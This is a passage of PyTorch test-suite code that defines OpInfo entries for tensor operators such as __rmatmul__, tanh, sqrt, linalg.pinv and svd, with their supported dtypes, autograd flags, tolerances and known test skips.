dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), BinaryUfuncInfo('__ror__', op=torch.Tensor.__ror__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), BinaryUfuncInfo('__rxor__', op=torch.Tensor.__rxor__, dtypes=integral_types_and(torch.bool), supports_out=False, supports_autograd=False, supports_forward_ad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('__rmatmul__', op=torch.Tensor.__rmatmul__, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), assert_autodiffed=True, sample_inputs_func=sample_inputs_matmul, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, decorators=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), DecorateInfo(toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestMathBits', 'test_conj_view'), DecorateInfo(toleranceOverride({torch.float32: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_noncontiguous_samples'), ), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), # https://github.com/pytorch/pytorch/issues/67470 DecorateInfo(unittest.skip("67470!"), 'TestCommon', 'test_noncontiguous_samples', device_type='cpu', dtypes=(torch.long,)), # Fails on XLA. # AssertionError: False is not true : Tensors failed to compare as equal DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), # https://github.com/pytorch/pytorch/issues/71774 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.long,)), )), BinaryUfuncInfo('__rmod__', op=torch.Tensor.__rmod__, dtypes=floating_types_and(torch.bfloat16, torch.half,), dtypesIfCUDA=all_types_and(torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), # Support autograd after torch.remainder(Tensor, Tensor) supports # autograd of the second argument. 
# https://github.com/pytorch/pytorch/pull/58476/files#r637167630 # supports_autograd=False, assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::remainder'],), BinaryUfuncInfo('__rpow__', op=torch.Tensor.__rpow__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), # Reference: https://github.com/pytorch/pytorch/issues/54774 # "log2" "_vml_cpu" not implemented for Half backward_dtypes=all_types_and_complex_and(torch.bfloat16), backward_dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), # TODO: FIXME tolerance is too high DecorateInfo(unittest.skip('Skipped!'), 'TestGradients'), ), assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::pow'],), BinaryUfuncInfo('__rsub__', op=torch.Tensor.__rsub__, dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, supports_two_python_scalars=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit',), ), assert_autodiffed=True, autodiff_nonfusible_nodes=['aten::rsub'],), BinaryUfuncInfo('rsub', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, supports_inplace_autograd=False, assert_autodiffed=None, sample_inputs_func=sample_inputs_add_sub), OpInfo('select', aten_backward_name='select_backward', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool, torch.chalf), sample_inputs_func=sample_inputs_select, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('select_scatter', dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=sample_inputs_select_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('slice_scatter', dtypes=all_types_and(torch.bfloat16, torch.half, torch.bool), sample_inputs_func=sample_inputs_slice_scatter, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('signbit', ref=np.signbit, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.half), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False,), UnaryUfuncInfo('tan', ref=np.tan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), 
DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.float64], active_if=TEST_WITH_ROCM), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), # RuntimeError: "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # same reason as above DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), # tan(pi/2 * odd_number) is nan reference_numerics_filter=NumericsFilter( condition=lambda x: close_to_int(x / (math.pi * 0.5)), safe_val=math.pi)), UnaryUfuncInfo('tanh', ref=np.tanh, aten_backward_name='tanh_backward', aliases=('nn.functional.tanh',), decorators=(precisionOverride({torch.bfloat16: 1e-2}),), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=(IS_MACOS or IS_WINDOWS)), # alias, nn.functional.tanh, will produce (because of warning string saved): # "RuntimeError: Expected to not find "tanh" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping'), DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), # tan(j * pi/2 * odd_number) is nan reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 0.5j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), OpInfo('tensor_split', ref=np.array_split, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_tensor_split,), OpInfo('hsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_hsplit, error_inputs_func=error_inputs_hsplit,), OpInfo('vsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_vsplit, error_inputs_func=error_inputs_vsplit,), OpInfo('dsplit', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_dsplit, error_inputs_func=error_inputs_dsplit,), OpInfo('triangular_solve', op=torch.triangular_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_legacy_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Gradcheck fails DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=floating_and_complex_types()), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), UnaryUfuncInfo('trunc', aliases=('fix', ), ref=np.trunc, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), UnaryUfuncInfo('exp2', aliases=('special.exp2', ), ref=np_unary_ufunc_integer_promotion_wrapper(np.exp2), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('expm1', aliases=('special.expm1', ), ref=np_unary_ufunc_integer_promotion_wrapper(np.expm1), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/48926#issuecomment-739734774 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('nan_to_num', ref=np.nan_to_num, dtypes=all_types_and(torch.half, torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bool, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, skips=( DecorateInfo(unittest.skip("Skipped! sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), # Passing numpy_kwargs via sample_kwargs, as numpy does comparison # with BFloat16 in float, since it currently doesn't support BFloat16. 
# Ref: https://github.com/pytorch/pytorch/issues/57982#issuecomment-839150556 sample_kwargs=lambda device, dtype, input: ({}, {'posinf': torch.finfo(torch.bfloat16).max, 'neginf': torch.finfo(torch.bfloat16).min}) if dtype is torch.bfloat16 else ({}, {})), UnaryUfuncInfo('reciprocal', ref=np_unary_ufunc_integer_promotion_wrapper(np.reciprocal), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/45690 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble]), # Reference: https://github.com/pytorch/pytorch/pull/49102#issuecomment-744604601 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), )), UnaryUfuncInfo('rsqrt', ref=lambda x: np.reciprocal(np.sqrt(x)), domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.half: 5e-2}),), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.cfloat, torch.cdouble)), )), UnaryUfuncInfo('sqrt', ref=np.sqrt, supports_sparse=True, domain=(0, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_sparse_csr=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 7e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/47358 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), # Reference: https://github.com/pytorch/pytorch/pull/47293#issuecomment-721774436 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), )), UnaryUfuncInfo('square', ref=np.square, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), decorators=(precisionOverride({torch.complex64: 3e-4, torch.bfloat16: 3e-1}),), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/52549 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble]), # >>> t = torch.tensor(complex(-0.01, float("inf"))) # >>> np.square(t.numpy()) # (-inf-infj) # >>> t.square() # tensor(-inf-infj) # >>> t.cuda().square() # tensor(inf+nanj, device='cuda:0') DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cfloat, torch.cdouble]), # Reference: https://github.com/pytorch/pytorch/pull/52551#issuecomment-782596181 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), ),), OpInfo('lerp', dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types_and(torch.half, torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_lerp, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True), OpInfo('linalg.inv', aten_name='linalg_inv', op=torch.linalg.inv, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.inv_ex', aten_name='linalg_inv_ex', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_invertible, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), UnaryUfuncInfo('angle', ref=np.angle, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.chalf, torch.bool), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), backward_dtypes=floating_and_complex_types_and(torch.bfloat16, torch.float16), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse_csr=True, supports_complex_to_float=True, skips=( # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,),), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,),), )), UnaryUfuncInfo('isfinite', ref=np.isfinite, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_autograd=False), UnaryUfuncInfo('isinf', ref=np.isinf, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_sparse=True, supports_sparse_csr=True, supports_autograd=False, skips=( # "nonzero_count_cpu" not implemented for 'ComplexHalf' # "nonzero_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.chalf,)), # "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.chalf,)), )), UnaryUfuncInfo('isposinf', ref=np.isposinf, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), UnaryUfuncInfo('isneginf', ref=np.isneginf, dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), UnaryUfuncInfo('isreal', ref=np.isreal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_autograd=False), UnaryUfuncInfo('isnan', ref=np.isnan, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_sparse=True, supports_sparse_csr=True, supports_autograd=False), OpInfo('linalg.solve', aten_name='linalg_solve', op=torch.linalg.solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # AssertionError: Scalars are not equal! 
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.solve_triangular', aten_name='linalg_solve_triangular', op=torch.linalg.solve_triangular, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_solve_triangular, supports_fwgrad_bwgrad=True, skips=(skipCPUIfNoLapack,), # linalg.solve_triangular cannot be batched over because of a call to out.copy_(result); supports_forward_ad=True), OpInfo('linalg.matrix_rank', aten_name='linalg_matrix_rank', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), ), OpInfo('linalg.matrix_rank', aten_name='linalg_matrix_rank', variant_test_name='hermitian', dtypes=floating_and_complex_types(), supports_autograd=False, sample_inputs_func=sample_inputs_linalg_pinv_hermitian, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), ), OpInfo('linalg.pinv', aten_name='linalg_pinv', op=torch.linalg.pinv, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( # errors with "leaked XXXX bytes CUDA memory on device 0" DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),) ), OpInfo('linalg.pinv', aten_name='linalg_pinv', variant_test_name='singular', # pinv is Frechet-differentiable in a rank-preserving neighborhood, # so we feed inputs that are the products of two full-rank factors, # to avoid any rank changes caused by the perturbations in the gradcheck op=lambda a, b: torch.linalg.pinv(a @ b.mT), dtypes=floating_and_complex_types(), supports_out=False, check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv_singular, # Only large tensors show issues with implicit backward used prior to # explicit backward implementation. 
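# A minimal illustrative sketch (not from this file) of the full-rank-factor construction
# above: an (m, k) @ (n, k).mT product has rank at most k, and the small perturbations
# gradcheck applies to the factors generically preserve that rank, so pinv stays
# differentiable along the checked directions:
# >>> a = torch.randn(5, 2, dtype=torch.double, requires_grad=True)
# >>> b = torch.randn(4, 2, dtype=torch.double)
# >>> torch.autograd.gradcheck(lambda a: torch.linalg.pinv(a @ b.mT), (a,))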
decorators=[slowTest, skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # CUDA runs out of memory DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad', device_type='cuda', dtypes=[torch.cdouble]), # This test takes almost 2 hours to run! DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad', device_type='cuda', dtypes=[torch.cdouble]), )), OpInfo('linalg.pinv', aten_name='linalg_pinv', variant_test_name='hermitian', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_linalg_pinv_hermitian, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ) ), OpInfo('eig', op=torch.eig, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_eig, error_inputs_func=error_inputs_eig, decorators=[ skipCUDAIfNoMagma, skipCPUIfNoLapack, ], ), OpInfo('einsum', # we need this lambda because SampleInput expects tensor input as the first argument # TODO(@heitorschueroff) update SampleInput to handle such cases op=lambda tensors, equation: torch.einsum(equation, tensors), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=floating_and_complex_types_and(torch.half, *[torch.bfloat16] if ((SM60OrLater and CUDA11OrLater) or TEST_WITH_ROCM) else []), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, # See https://github.com/pytorch/pytorch/issues/66357 sample_inputs_func=sample_inputs_einsum, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # test does not work with passing lambda for op # there's a test `test_einsum` in `test_jit.py` to handle this case # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('svd', op=torch.svd, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_svd, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, # We're using at::allclose, which does not have a batching rule check_batched_grad=False, check_batched_gradgrad=False, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack, with_tf32_off], skips=( # Fixme, forward over backward gives a numerical error DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('linalg.svd', op=torch.linalg.svd, 
